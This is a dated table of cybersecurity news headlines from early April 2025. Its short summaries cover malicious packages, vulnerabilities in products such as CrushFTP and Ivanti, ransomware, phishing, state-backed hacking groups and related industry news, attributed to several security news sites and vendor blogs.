| 6.4.25 | Verizon Call Filter API flaw exposed customers' incoming call history | A vulnerability in Verizon's Call Filter feature allowed customers to access the incoming call logs for another Verizon Wireless number through an unsecured API request. | Vulnerebility | BleepingComputer |
| 5.4.25 | North Korean Hackers Deploy BeaverTail Malware via 11 Malicious npm Packages | The North Korean threat actors behind the ongoing Contagious Interview campaign are spreading their tentacles on the npm ecosystem by publishing more | Virus | The Hacker News |
| 5.4.25 | Malicious Python Packages on PyPI Downloaded 39,000+ Times, Steal Sensitive Data | Cybersecurity researchers have uncovered malicious libraries in the Python Package Index (PyPI) repository that are designed to steal sensitive information. | Virus | The Hacker News |
| 5.4.25 | GitHub expands security tools after 39 million secrets leaked in 2024 | Over 39 million secrets like API keys and account credentials were leaked on GitHub throughout 2024, exposing organizations and users to significant security risks. | Incindent | |
| 5.4.25 | Microsoft adds hotpatching support to Windows 11 Enterprise | Microsoft has announced that hotpatch updates are now available for business customers using Windows 11 Enterprise 24H2 on x64 (AMD/Intel) systems, starting today. | OS | |
| 5.4.25 | Royal Mail investigates data leak claims, no impact on operations | Royal Mail is investigating claims of a security breach after a threat actor leaked over 144GB of data allegedly stolen from the company's systems. | Incindent | |
| 5.4.25 | ChatGPT is down worldwide with something went wrong error | ChatGPT, the famous artificial intelligence chatbot that allows users to converse with various personalities and topics, has connectivity issues worldwide. | AI | |
| 5.4.25 | Police shuts down KidFlix child sexual exploitation platform | Kidflix, one of the largest platforms used to host, share, and stream child sexual abuse material (CSAM) on the dark web, was shut down on March 11 following a joint action coordinated by German law enforcement. | CyberCrime | BleepingComputer |
| 5.4.25 | Counterfeit Android devices found preloaded with Triada malware | A new version of the Triada trojan has been discovered preinstalled on thousands of new Android devices, allowing threat actors to steal data as soon as they are set up. | Virus | BleepingComputer |
| 5.4.25 | Cisco warns of CSLU backdoor admin account used in attacks | Cisco warns admins to patch a critical Cisco Smart Licensing Utility (CSLU) vulnerability, which exposes a built-in backdoor admin account now used in attacks. | Vulnerebility | BleepingComputer |
| 5.4.25 | New Windows 11 trick lets you bypass Microsoft Account requirement | A previously unknown trick lets you easily bypass using a Microsoft Account in Windows 11, just as Microsoft tries to make it harder to use local accounts. | OS | BleepingComputer |
| 5.4.25 | North Korean IT worker army expands operations in Europe | North Korea's IT workers have expanded operations beyond the United States and are now increasingly targeting organizations across Europe. | APT | BleepingComputer |
| 5.4.25 | Google rolls out easy end-to-end encryption for Gmail business users | Google has started rolling out a new end-to-end encryption (E2EE) model for Gmail enterprise users, making it easier to send encrypted emails to any recipient. | Safety | |
| 5.4.25 | Nearly 24,000 IPs behind wave of Palo Alto Global Protect scans | A significant spike in scanning activity targeting Palo Alto Network GlobalProtect login portals has been observed, with researchers concerned it may be a prelude to an upcoming attack or flaw being exploited. | Security | |
| 5.4.25 | Apple backports zero-day patches to older iPhones and Macs | Apple has released security updates that backport fixes for actively exploited vulnerabilities that were exploited as zero-days to older versions of its operating systems. | OS | |
| 5.4.25 | Critical auth bypass bug in CrushFTP now exploited in attacks | Attackers are now targeting a critical authentication bypass vulnerability in the CrushFTP file transfer software using exploits based on publicly available proof-of-concept code. | Vulnerebility | BleepingComputer |
| 5.4.25 | VMware Workstation auto-updates broken after Broadcom URL redirect | VMware Workstation users report that the software's automatic update functionality is broken after Broadcom redirected the download URL to its generic support page, triggering certificate errors. | Security | BleepingComputer |
| 5.4.25 | OpenAI says Deep Research is coming to ChatGPT free "very soon" | OpenAI has confirmed that its powerful AI agent "Deep Research" will begin rolling out to free users "very soon." At the moment, Deep Research is available only for Plus and Enterprise customers. | AI | BleepingComputer |
| 5.4.25 | SpotBugs Access Token Theft Identified as Root Cause of GitHub Supply Chain Attack | The cascading supply chain attack that initially targeted Coinbase before becoming more widespread to single out users of the "tj-actions/changed-files" | Hack | The Hacker News |
| 5.4.25 | Ransomware Attack Levels Remain High as Major Change Looms | March saw a potential leadership shift in ransomware attacks, sustained high attack volumes, and the rise of new threat groups. | Ransom blog | Cyble |
| 5.4.25 | Critical CrushFTP Authentication Bypass (CVE-2025-2825) Exposes Servers to Remote Attacks | The SonicWall Capture Labs threat research team became aware of an authentication bypass vulnerability in CrushFTP Servers, assessed its impact, and developed mitigation measures. CrushFTP is a resourceful enterprise-grade file transfer application used widely among organizations. It also supports multi-protocols for data exchange among systems and users with S3-compatible API access. | Vulnerebility blog | SonicWall |
| 5.4.25 | Hexamethy Ransomware Displays Scary Lock Screen During File Encryption | The Sonicwall Capture Labs threat research team has recently observed new ransomware named HEXAMETHYLCYCLOTRISILOXANE, or Hexamethy in short. This malware produces a scary cinematic display during the encryption process and flashes text stating, “No more files for you,” and “Your files are in hostage by the HEXAMETHYLCYCLOTRISILOXANE Ransomware." | Ransom blog | SonicWall |
| 5.4.25 | Evolution of Sophisticated Phishing Tactics: The QR Code Phenomenon | Since late 2024, Unit 42 researchers have observed attackers using several new tactics in phishing documents containing QR codes. One tactic involves attackers concealing the final phishing destination using legitimate websites' redirection mechanisms. | Phishing blog | Palo Alto |
| 5.4.25 | OH-MY-DC: OIDC Misconfigurations in CI/CD | In the course of investigating the use of OpenID Connect (OIDC) within continuous integration and continuous deployment (CI/CD) environments, Unit 42 researchers discovered problematic patterns and implementations that could be leveraged by threat actors to gain access to restricted resources. One instance of such an implementation was identified in CircleCI’s OIDC. | Cyber blog | Palo Alto |
| 5.4.25 | The good, the bad and the unknown of AI: A Q&A with Mária Bieliková | The computer scientist and AI researcher shares her thoughts on the technology’s potential and pitfalls – and what may lie ahead for us | AI blog | Eset |
| 5.4.25 | This month in security with Tony Anscombe – March 2025 edition | From an exploited vulnerability in a third-party ChatGPT tool to a bizarre twist on ransomware demands, it's a wrap on another month filled with impactful cybersecurity news | Cyber blog | |
| 5.4.25 | Resilience in the face of ransomware: A key to business survival | Your company’s ability to tackle the ransomware threat head-on can ultimately be a competitive advantage | Cyber blog | |
| 5.4.25 | The Bug Report - March 2025 Edition | March Madness hits infosec: kernel bugs, Tomcat deserialization, and SonicWall shenanigans. Catch the highlights and patch fast before you’re benched! | Vulnerebility blog | Trelix |
| 4.4.25 | Microsoft uses AI to find flaws in GRUB2, U-Boot, Barebox bootloaders | Microsoft used its AI-powered Security Copilot to discover 20 previously unknown vulnerabilities in the GRUB2, U-Boot, and Barebox open-source bootloaders. | AI | |
| 4.4.25 | Phishing platform 'Lucid' behind wave of iOS, Android SMS attacks | A phishing-as-a-service (PhaaS) platform named 'Lucid' has been targeting 169 entities in 88 countries using well-crafted messages sent on iMessage (iOS) and RCS (Android). | Phishing | |
| 4.4.25 | Hackers abuse WordPress MU-Plugins to hide malicious code | Hackers are utilizing the WordPress mu-plugins ("Must-Use Plugins") directory to stealthily run malicious code on every page while evading detection. | Virus | |
| 4.4.25 | North Korean hackers adopt ClickFix attacks to target crypto firms | The notorious North Korean Lazarus hacking group has reportedly adopted 'ClickFix' tactics to deploy malware targeting job seekers in the cryptocurrency industry, particularly centralized finance (CeFi). | APT | |
| 4.4.25 | Microsoft tests new Windows 11 tool to remotely fix boot crashes | Microsoft has begun testing a new Windows 11 tool called Quick Machine Recovery, which is designed to remotely deploy fixes for buggy drivers and configurations that prevent the operating system from starting. | OS | |
| 4.4.25 | New Crocodilus malware steals Android users’ crypto wallet keys | A newly discovered Android malware dubbed Crocodilus tricks users into providing the seed phrase for the cryptocurrency wallet using a warning to back up the key to avoid losing access. | Virus | |
| 4.4.25 | Microsoft's killing script used to avoid Microsoft Account in Windows 11 | Microsoft has removed the 'BypassNRO.cmd' script from Windows 11 preview builds, which allowed users to bypass the requirement to use a Microsoft Account when installing the operating system. | OS | BleepingComputer |
| 4.4.25 | Critical Ivanti Flaw Actively Exploited to Deploy TRAILBLAZE and BRUSHFIRE Malware | Ivanti has disclosed details of a now-patched critical security vulnerability impacting its Connect Secure that has come under active exploitation in the wild. | Vulnerebility | The Hacker News |
| 4.4.25 | OPSEC Failure Exposes Coquettte's Malware Campaigns on Bulletproof Hosting Servers | A novice cybercrime actor has been observed leveraging the services of a Russian bulletproof hosting ( BPH ) provider called Proton66 to facilitate their operations. | Virus | |
| 4.4.25 | CERT-UA Reports Cyberattacks Targeting Ukrainian State Systems with WRECKSTEEL Malware | The Computer Emergency Response Team of Ukraine (CERT-UA) has revealed that no less than three cyber attacks were recorded against state administration | Virus | |
| 4.4.25 | Critical Flaw in Apache Parquet Allows Remote Attackers to Execute Arbitrary Code | A maximum severity security vulnerability has been disclosed in Apache Parquet's Java Library that, if successfully exploited, could allow a remote attacker to | Vulnerebility | The Hacker News |
| 4.4.25 | Microsoft Warns of Tax-Themed Email Attacks Using PDFs and QR Codes to Deliver Malware | Microsoft is warning of several phishing campaigns that are leveraging tax-related themes to deploy malware and steal credentials. "These campaigns notably use | Phishing | The Hacker News |
| 4.4.25 | New Report Explains Why CASB Solutions Fail to Address Shadow SaaS and How to Fix It | Whether it's CRMs, project management tools, payment processors, or lead management tools - your workforce is using SaaS applications by the pound. | Vulnerebility | |
| 4.4.25 | Lazarus Group Targets Job Seekers With ClickFix Tactic to Deploy GolangGhost Malware | The North Korean threat actors behind Contagious Interview have adopted the increasingly popular ClickFix social engineering tactic to lure job seekers in the | APT | The Hacker News |
| 3.4.25 | Google Patches Quick Share Vulnerability Enabling Silent File Transfers Without Consent | Cybersecurity researchers have disclosed details of a new vulnerability impacting Google's Quick Share data transfer utility for Windows that could be exploited to | Vulnerebility | |
| 3.4.25 | Triada Malware Preloaded on Counterfeit Android Phones Infects 2,600+ Devices | Counterfeit versions of popular smartphone models that are sold at reduced prices have been found to be preloaded with a modified version of an Android | Virus | |
| 3.4.25 | Legacy Stripe API Exploited to Validate Stolen Payment Cards in Web Skimmer Campaign | Threat hunters are warning of a sophisticated web skimmer campaign that leverages a legacy application programming interface (API) from payment | Exploit | The Hacker News |
| 3.4.25 | Europol Dismantles Kidflix With 72,000 CSAM Videos Seized in Major Operation | In one of the largest coordinated law enforcement operations, authorities have dismantled Kidflix, a streaming platform that offered child sexual abuse material | CyberCrime | The Hacker News |
| 3.4.25 | Google Fixed Cloud Run Vulnerability Allowing Unauthorized Image Access via IAM Misuse | Cybersecurity researchers have disclosed details of a now-patched privilege escalation vulnerability in Google Cloud Platform (GCP) Cloud Run that could have | Vulnerebility | |
| 2.4.25 | Outlaw Group Uses SSH Brute-Force to Deploy Cryptojacking Malware on Linux Servers | Cybersecurity researchers have shed light on an "auto-propagating" cryptocurrency mining botnet called Outlaw (aka Dota) that's known for targeting SSH servers with | Cryptocurrency | |
| 2.4.25 | FIN7 Deploys Anubis Backdoor to Hijack Windows Systems via Compromised SharePoint Sites | The financially motivated threat actor known as FIN7 has been linked to a Python-based backdoor called Anubis (not to be confused with an Android banking trojan | APT | |
| 2.4.25 | New Malware Loaders Use Call Stack Spoofing, GitHub C2, and .NET Reactor for Stealth | Cybersecurity researchers have discovered an updated version of a malware loader called Hijack Loader that implements new features to evade detection and establish persistence on compromised systems. "Hijack Loader released a new | Virus | The Hacker News |
| 2.4.25 | Over 1,500 PostgreSQL Servers Compromised in Fileless Cryptocurrency Mining Campaign | Exposed PostgreSQL instances are the target of an ongoing campaign designed to gain unauthorized access and deploy cryptocurrency miners. Cloud security firm | Cryptocurrency | The Hacker News |
| 2.4.25 | Enterprise Gmail Users Can Now Send End-to-End Encrypted Emails to Any Platform | On the 21st birthday of Gmail , Google has announced a major update that allows enterprise users to send end-to-end encrypted (E2EE) to any user in any email | Safety | |
| 2.4.25 | Lucid PhaaS Hits 169 Targets in 88 Countries Using iMessage and RCS Smishing | A new sophisticated phishing-as-a-service (PhaaS) platform called Lucid has targeted 169 entities in 88 countries using smishing messages propagated via | Phishing | |
| 1.4.25 | Apple Backports Critical Fixes for 3 Recent 0-Days Impacting Older iOS and macOS Devices | Apple on Monday backported fixes for three vulnerabilities that have come under active exploitation in the wild to older models and previous versions of the | OS | The Hacker News |
| 1.4.25 | Nearly 24,000 IPs Target PAN-OS GlobalProtect in Coordinated Login Scan Campaign | Cybersecurity researchers are warning of a spike in suspicious login scanning activity targeting Palo Alto Networks PAN-OS GlobalProtect gateways, with nearly | Hack | |
| 1.4.25 | China-Linked Earth Alux Uses VARGEIT and COBEACON in Multi-Stage Cyber Intrusions | Cybersecurity researchers have shed light on a new China-linked threat actor called Earth Alux that has targeted various key sectors such as government, | APT | |
| 1.4.25 | Apple Fined €150 Million by French Regulator Over Discriminatory ATT Consent Practices | Apple has been hit with a fine of €150 million ($162 million) by France's competition watchdog over the implementation of its App Tracking Transparency | OS | The Hacker News |
| 1.4.25 | Russian Hackers Exploit CVE-2025-26633 via MSC EvilTwin to Deploy SilentPrism and DarkWisp | The threat actors behind the zero-day exploitation of a recently-patched security vulnerability in Microsoft Windows have been found to deliver two new backdoors | Virus |